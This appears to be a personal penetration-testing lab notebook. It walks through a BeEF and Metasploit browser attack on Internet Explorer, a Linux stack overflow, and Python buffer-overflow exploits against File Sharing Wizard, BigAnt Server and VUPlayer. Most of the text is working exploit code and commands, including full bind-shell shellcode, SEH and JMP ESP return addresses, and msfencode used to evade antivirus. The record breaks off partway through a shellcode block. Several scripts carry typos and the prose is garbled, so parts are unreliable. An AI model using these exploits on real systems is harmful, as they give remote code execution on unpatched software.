Exploit Internet Explore with BeEF and Metasploit

BeEf is browsing exploitation framework

1. actived beef ng in console : menu --> Apps -->Explotation Tools --> Social Engineering Tools -->
BEEF XSS Framework --> BeEF ng

show in terminal

2. open browser and type http://127.0.1.1:3000/ui/panel and input username : beef password : beef

then goes to internet explorer in windows virtual box, and browse http://192.168.56.1/beef/panel.ui,

 it will automatically the beef control panell detect the IP address target (192.168.56.101), and the interface should be like this:

so now we need to make the payload. we will using "browser_autopwn". open the console and goes to msfconsole and the step is below in the picture

now our payload is ready, and we got http:0.0.0.0:8080/ . we need to change it with use our IP then load it to beef contol panel, browser, and site redirect, then execute

after that from windows internet explorer browse http:// 192.168.56.1: 8080/

 our payload will automatically  execute. and succeed.

About Social Engineering and SET

 Social Engineering

     Social Engineering is the name of a technique of information gathering by exploiting the victims psychology. Or perhaps should also be regarded as fraud. Social Engineering requires patience and caution to the unsuspecting victim. We are required to be creative and able to think like a victim.
Social Engineering is the art of forcing others to do things according to your expectations or desires. Of course, do not force that openly or outside of normal behavior is usually done with the victim.

      Social engineering concentrates on the weakest chain of computer network systems, namely humans. As we know, no computer system that does not involve human interaction. And worse, this vulnerability is universal, independent of platforms, operating systems, protocols, software or hardware. That is, each system has the same weakness in human factors. Any person who has physical access to the system is a threat, even if the person is not included in the security policy that had been developed. Other methods such as hacking, social engineering also requires preparation, even most of the work includes the preparation itself.

SET

      SET is a python driven suite of custom tools which solaly focuses on attacking the human elemant of penestrating testing. it is main purpose is to augment and simulate social engineering attack and allow the tester to effectively test how targeted attack may succed. 

 

Example Using Auxiliary Module

Port Scanning
metasploit has several port scanners built into its auxiliary mocules that directly integrate with most aspects of the Framework. Lets conduct a simple scan of a single host using metasploit's SYN Port Scanner.

msf > use auxiliary/scanner/portscan/syn
msf  auxiliary(syn) > show options

Module options (auxiliary/scanner/portscan/syn):

   Name       Current        Setting  Required  Description
   ----       ---------------  --------  -----------
   BATCHSIZE  256           yes       The number of hosts to scan per set
   INTERFACE                   no        The name of the interface
   PORTS      1-10000        yes       Ports to scan (e.g. 22-25,80,110-900)
   RHOSTS                         yes       The target address range or CIDR identifier
   SNAPLEN    65535        yes       The number of bytes to capture
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    500             yes      The reply read timeout in milliseconds

msf  auxiliary(syn) > set RHOSTS 192.168.56.101
RHOSTS => 192.168.56.101
msf  auxiliary(syn) > set THREADS 50
THREADS => 50
msf  auxiliary(syn) > run

[-] Auxiliary failed: RuntimeError eth0: no IPv4 address assigned
[-] Call stack:
[-]   /opt/framework/msf3/lib/msf/core/exploit/capture.rb:108:in `setfilter'
[-]   /opt/framework/msf3/lib/msf/core/exploit/capture.rb:108:in `open_pcap'
[-]   /opt/framework/msf3/modules/auxiliary/scanner/portscan/syn.rb:51:in `run_batch'
[-]   /opt/framework/msf3/lib/msf/core/auxiliary/scanner.rb:162:in `block in run'
[-]   /opt/framework/msf3/lib/msf/core/thread_manager.rb:64:in `call'
[-]   /opt/framework/msf3/lib/msf/core/thread_manager.rb:64:in `block in spawn'
[*] Auxiliary module execution completed

About msfpayload and msfencode

1. msfpayload

      The msfpayload is component of metasploit's that allows to generate shellcode, executables and much more for use in exploitsoutside of the framework.

      Shellcode can be generated in many formats including JavaScript, Ruby, C, and even Visual Basic for Application. Each output format will be useful in various situations.

     For example, if we are working with a Python-based proof of concept, C-style output might be best, if we are working on browser exploit, a Javascript output format might be best. After we have desired output, we can easily insert the payload directly into an HTML file to trigger the exploit

root@bt:/pentest/exploits/framework# msfpayload windows/meterpreter/bind_tcp

2. msfencode
         The msfencode is development of metasploit's which help us to avoid bad characters and evade antivirus and IDS by encoding the original payload in away what does not include bad characters.
         When in doubt, thought, we really can't go wrong with the x86/shikata_ga_nai encoder, the only encoder with the rank of Excellent, a measure of reliability and stability of a module. to see the list of encoders available, append -1 to msfcode as shown next. the payloads are ranked in order of reliability.

root@bt:/pentest/exploits/framework# msfencode -1

Exploit Linux

1. turn off linux ASLR

2.making vulnerable application

//i am vulner thing
#include <stdio.h>
#include <string.h>

int main(int argc, char** argv)
{
char buffer[500];
strcpy(buffer, argv[1]);

return 0;
}

3. compile vulnerable application

4. now we can find offset needed to trigger and overwrite

5. check if the buffer already overwrite EIP and ESP information

6. find address EIP

so we get EIP address 0xbffff12c but this is not the real esp address, we need to decrease 200 bytes so my EIP address is 0xbfffef2c (using KCalc)
then we now if we need 508bytes from this formula :
323 bytes of junk + a shellcode which is 45 bytes = 408 bytes.
508 bytes - 408 bytes = 100 bytes.
So after the shellcode we still have 100 bytes, we divide 100 with 4 (to fit an entire memory address:
\x41\x41\x41\x41 for example.) and get 35

7. generate shellcode from sc_generate with lenght 45 bytes

$(python -c 'print "\x90"*323 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x2c\xfe\xff\xbf"*35')

check EIP address

modification exploit

$(python -c 'print "\x90"*370 + "\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x83\xec\x01\xc6\x04\x24\x2f\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80" + "\x2c\xfe\xff\xbf"*35')

Exploit File Sharing Wizard Application

this time i will try to exploit file sharing wizard application. this aplication use with internet conection so i will get the vulner from wireshark.

making fuzzer
based of wireshark analyzer we will send to application 2000 bytes of data, this fuzzer with python

try 1 :

#! /usr/bin/python
import socket
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

header='HTTP/1.1\r\n
buffer='A'*2000 + '\r\n\r\n'

sock.connect(('192.168.56.101',80))
sock.send(header+buffer)
sock.close()

run fuzzer this application, application not crash

try 2 :

#! /usr/bin/python
import socket
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

header='HTTP/1.1\r\n'
header+='HOST : 239.255.255.250:190\r\n'
buffer='A'*2000 + '\r\n\r\n'

sock.connect(('192.168.56.101',80))
sock.send(header+buffer)
sock.close()


 i try to modification fuzzer.




#/usr/bin/pythom
import socket

buffer="\x41"*2000
head=('GET %s HTTP/1.1\r\n\r\n') % (buffer)

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(('192.168.56.105',80))
sock.send(head)
sock.close()

run fuzzer in console and what happen,.....application crash

Exploit BigAnt Server

Thesse local server aplication has opening port number 6660. we will try attack from USV.






Make fuzzer

#!/usr/bin/pyton
import socket
buffer = "USV "+ "\x41" * 2500 + "\r\n\r\n"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

run BigAnt server than attach to Ollydbg. we will try to send 2500 buffer to the server with fuzzer, and see what happend

the aplication got crash but the EIP is not overwrite by buffer which we send, because it has SEH handling went overflow happend. we can check it by click on view --> SEH Cain.

to send buffer to the stack we can press shift+f9 then it can pass seh handler.

Get POP POP RETN
we need to get POP POP RETN address to overwrite SEH address in the application. so we will use "view" then "executable module"

we can see POP POP RETN and inside of module with using Ollydbg from Olly dbg click view the executable module and double click to the file vbajet32.dll. after we got inside to windows CPU of vbajet32.dll file right click searchfor than sequece of command and than filled it with POP r32, POP r32 and RETN -->Find. then we will get address in memory of vbajet32.dll

create pattern offset
to get how many byte stuck SEH, we use pattern create on metasploit. reload the character from pattern create to the buffer.

root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2500 > Big.txt

#!/usr/bin/pyton
import socket
buffer = "USV "
buffer+= "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2D" + "\r\n\r\n"
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

restart the Ollydbg and BigAnt server then run it again with new fuzzer, to by pass fuzzer press shift+f9. to count a number buffer we can use pattern offset.

root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 42326742
966

now we have buffer about 966 byte to trigger SEH handle then we will put in to the fuzzer

#!/usr/bin/python
import socket

buffer ="USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x41\x41\x41\x41"
buffer+= "\x90" * (2504 - len(hancur))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

after that restart Ollydbg and BigAnt server, then run it with the fuzzer. BigAnt server will crash and buffer \x41 will overwrite SEH handler.

Controling CPU proses
After we get byte address as trigger of SEH now, we loaded offset address from vbajet32.dll which consist POP POP RETN to the fuzzer

#!/usr/bin/python
import socket

buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xcc\xcc\xcc\xcc"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101".6660))
sock.send(buffer)
sock.close()

before we run BIgAnt server we need to have breakpoint on SEH memory address to make sure if our exploit really pointed to the right target. then running with fuzzer.

press shift+f9 to continue the process of memory vbajet32.dll and f7 to get RETN

but we have problem now, memory space just about 4 byte, it is'nt enough to keep a shell code. show we need to relocated to the address which has bigger space. right click on 015FFD7C then "follow in dump " then "selection"

Generated Shell code
we wil use

root@bt:/pentest/exploits/framework2# ./msfweb
+----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

then opened in the browser


i will use windows bind shell to generated shell code

then will reload the shell cod eto the fuzzer without the bad character. we must check the shell code, do not have any bad character. so we check it manualy with send the fuzzer row by row. after the shellcode is clear from bad character the finally fuzzer is like this.....

 #!/usr/bin/python
import socket

buffer = "USV "
buffer+= "\x90" * 962
buffer+= "\xeb\x06\x90\x90"
buffer+= "\x6A\x19\x9A\x0F"
buffer+= "\x90" * 32
buffer+= ("\xdd\xc5\xb8\x4a\x27\x71\x35\x33\xc9\xb1\x51\xd9\x74\x24\xf4\x5e"
"\x83\xc6\x04\x31\x46\x13\x03\x0c\x34\x93\xc0\x6c\x50\xb8\x66\x64"
"\x5c\xc1\x86\x8b\xff\xb5\x15\x57\x24\x41\xa0\xab\xaf\x29\x2e\xab"
"\xae\x3e\xbb\x04\xa9\x4b\xe3\xba\xc8\xa0\x55\x31\xfe\xbd\x67\xab"
"\xce\x01\xfe\x9f\xb5\x42\x75\xd8\x74\x88\x7b\xe7\xb4\xe6\x70\xdc"
"\x6c\xdd\x50\x57\x68\x96\xfe\xb3\x73\x42\x66\x30\x7f\xdf\xec\x19"
"\x9c\xde\x19\xa6\xb0\x6b\x54\xc4\xec\x77\x06\xd7\xdc\x5c\xac\x5c"
"\x5d\x53\xa6\x22\x6e\x18\xc8\xbe\xc3\x95\x69\xb6\x45\xc2\xe7\x88"
"\x77\xfe\xa8\xeb\x5e\x98\x1b\x75\x37\x56\xae\x11\xb0\xeb\xfc\xbe"
"\x6a\xf3\xd1\x28\x58\xe6\x2e\x93\x0e\x06\x18\xbc\x27\x1d\xc3\xc3"
"\xd5\xd6\x0e\x96\x4f\xe5\xf1\xc8\xf8\x30\x04\x1d\x55\x95\xe8\x0b"
"\xf5\x49\x44\xe0\xa9\x2e\x39\x45\x1d\x4e\x6d\x2f\xc9\xa1\xd2\xc9"
"\x5a\x4b\x0b\x80\x35\xef\xd6\xda\x02\xb8\x19\xcc\xe7\x57\xb7\xa5"
"\x08\x87\x5f\xe1\x5a\x06\x49\xbe\x5b\x81\xda\x15\x5b\xfe\xb5\x70"
"\xea\x79\x0c\x2d\x12\x53\xdf\x85\xb8\x09\x1f\xf5\xd2\xda\x38\x8c"
"\x12\x63\x90\x91\x4d\xc1\xe1\xbd\x14\x80\x79\x5b\xb1\x37\xef\x2a"
"\xa4\xd2\xbf\x75\x0e\xef\xc9\x62\x3a\xab\x40\x8e\x8a\xf3\xa0\xe4"
"\x13\xb1\x6b\x06\xa9\x1a\xe7\x7b\x54\x5b\xac\x28\x02\xf3\xc0\xd0"
"\xe6\x12\xda\x59\x4d\xe4\xf2\xfa\x1a\x48\xaa\xad\xf5\x06\x4d\x1c"
"\xa7\x83\x1c\x61\x97\x44\x32\x44\x1d\x5b\x1f\x89\xc8\x09\x5f\x8a"
"\xc2\x32\x4f\xff\x7a\x31\xf3\x3b\xe0\x36\x22\x91\x16\x18\xa3\xe5"
"\x63\x9d\x6b\x56\x8b\x48\x6c\x88")
buffer+= "\x90" * (2504 - len(buffer))
buffer+= "\r\n\r\n"

sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(("192.168.56.101",6660))
sock.send(buffer)
sock.close()

runing the payload
to run the payload open BigAnt server than run it, after that from telnet we send the fuzzer ang connecting the telnet

Exploit VUPlayer

Buffer Overflow VUPlayer

A. Try

1. I try make fuzzer with format file .vpl

#!usr/bin/python

filename="error.vpl"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

2. run file python in terminal to make new file
3. run VUPlayer and load fuzzer with format file .vpl, aplication not crash and try buffer * until 2000 VUPlayer not crash too.
4. I try make fuzzer with format file .m3u

#!usr/bin/python

filename="error.m3u"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

5. run fuzzer in terminal to make new file .m3u.
6. run VUPlayer and load with fuzzer with format file .m3u same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
7. I try again make fuzzer with format file .pls.

#!usr/bin/python

filename="error.pls"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

8. run fuzzer in terminal to make file .pls
9. run VUPlayaer again and load result fuzzer with format file .pls same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
10. I try again make fuzzer with format .asx

#!usr/bin/python

filename="error.asx”

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

11. run fuzzer in teminal to make file .asx
12. run VUPlayer again and load result fuzzer with format file .asx same aplication not crash. I try change buffer math until 2000 but also not crash.
13. I try again make fuzzer with format .wax.

#!usr/bin/python

filename="error.wax"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

14. run fuzzer in terminal to make file.wax
15. run VUPlayaer again and load result fuzzer with format file .pls same not crash. I try change buffer math 2000 and this show. Aplication be lost on the window.
16. Make fuzzer with python language the useful make format file .cue.

#!usr/bin/python

filename="error.cue"

buffer="\x41" * 1000

file=open(filename,'w')

file.write(buffer)

file.close()

17. run fuzzer on terminal to make file .cue
18. run VUPlayer again and load result fuzzer with format file .asx same aplication not crash. I try change buffer math until 2000 but also not crash.

I try make result this case make way to buffer format file .m3u, .pls, .wax, but I choses format file is .m3u.

B. Show Process Debbugging

1. run aplication UVPlayer in Ollydbg for see the process and analisys the memory.

2. make dummies data structur with pattern create
   -open terminal and type the terminal :
   root@bt:~# cd /pentest/exploits/framework/tools/
   root@bt:/pentest/exploits/framework/tools# ./pattern_create.rb 2000 > error.txt

       -type in terminal : #kwrite error.txt

        case talked about the function show dummies string structure.

       -copy and paste value error.txt and modifiying the fuzzer

#!usr/bin/python

filename="error1.m3u"

buffer="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co"

#buffer+="\x41" * 2000

file=open(filename,'w')

file.write(buffer)

file.close()

• run fuzzer after modification on terminal
• run UVPlayer on Ollydbg and load fuzzer modification and attention ESP memory and EIP memory.

3. count byte from pattern collection
   - type on terminal :
   root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 68423768
   1012

        in the case, EIP address at UVPlayer can overwrite is 1023,1024,1025    and 1016 because EIP address 4 byte only.

root@bt:/pentest/exploits/framework/tools# ./pattern_offset.rb 8Bh9Bi
1016

4. proof the address EIP
   -modification the fuzzer
   #! usr/bin/python
   filename="error2.m3u"
   buffer="\x90" * 1012
   buffer+="\xEF\xBE\xAD\xDE"
   file=open(filename,'w')
   file.write(buffer)
   file.close()

• run UVPlayer on Ollydbg and load fuzzer

5. proof the ESP address
   - modification fuzzer
   #! usr/bin/python
   filename="error3.m3u"
   buffer+="\x90" * 1012
   buffer+="\xEF\xBE\xAD\xDE"
   buffer+="\x90" * (1016-len(buffer))
   buffer+="\xCC" * (2000-len(buffer))
   file=open(filename,'w')
   file.write(buffer)
   file.close()

• run UVPlayer again on Ollydbg and load the fuzzer

100. JMP ESP
     1. search JMP ESP
     - run VUPlayer on Ollydbg, click View menu chose menu executable modules. In Executable modules window, I chose with method double click shell32.dll. Show new window shell32.dll and click right main window → search for -->Command and type JMP ESP then press Find buttom.

2. proof JMP ESP
   - modification fuzzer

#! usr/bin/python

filename="error4.m3u"

buffer="\x90" * 1012

buffer+="\xD7\x30\x9D\x7C"

buffer+="\xCC" * (1016-len(buffer))

buffer+="\xCC" * (2000-len(buffer))

file=open(filename,'w')

file.write(buffer)

file.close()

• run aplication on Ollydbg and load fuzzer after modification

500. Payload
     1. make payload
     - run metasploit2 GUI in terminal, type :
     root@bt:~# cd /pentest/exploits/framework2/
     root@bt:/pentest/exploits/framework2# ./msfweb
     +----=[ Metasploit Framework Web Interface (127.0.0.1:55555)

• open web broser and type :localhost:55555
  

  
• filter modules payload
• chose payload modules
• generate payload

2. modification fuzzer
   - copy and paste result generate payload from msfweb
   #! usr/bin/python
   filename="error5.m3u"
   buffer="\x90" * 1012
   buffer+="\xD7\x30\x9D\x7C"
   buffer+="\x90" * 32
   buffer+=("\xda\xd8\xbf\x29\xf7\x72\x58\x31\xc9\xd9\x74\x24\xf4\x58\xb1\x51"
   "\x83\xc0\x04\x31\x78\x13\x03\x51\xe4\x90\xad\x5d\x60\xbe\x03\x75"
   "\x8c\xbf\x63\x7a\x0f\xcb\xf0\xa0\xf4\x40\x4d\x94\x7f\x2a\x4b\x9c"
   "\x7e\x3c\xd8\x13\x99\x49\x80\x8b\x98\xa6\x76\x40\xae\xb3\x88\xb8"
   "\xfe\x03\x13\xe8\x85\x44\x50\xf7\x44\x8e\x94\xf6\x84\xe4\x53\xc3"
   "\x5c\xdf\xb3\x46\xb8\x94\x9b\x8c\x43\x40\x45\x47\x4f\xdd\x01\x08"
   "\x4c\xe0\xfe\xb5\x40\x69\x89\xd5\xbc\x71\xeb\xe6\x8c\x52\x8f\x63"
   "\xad\x54\xdb\x33\x3e\x1e\xab\xaf\x93\xab\x0c\xc7\xb5\xc3\x02\x99"
   "\x47\xf8\x4b\xda\x8e\x66\x3f\x42\x47\x54\x8d\xe2\xe0\xe9\xc3\xad"
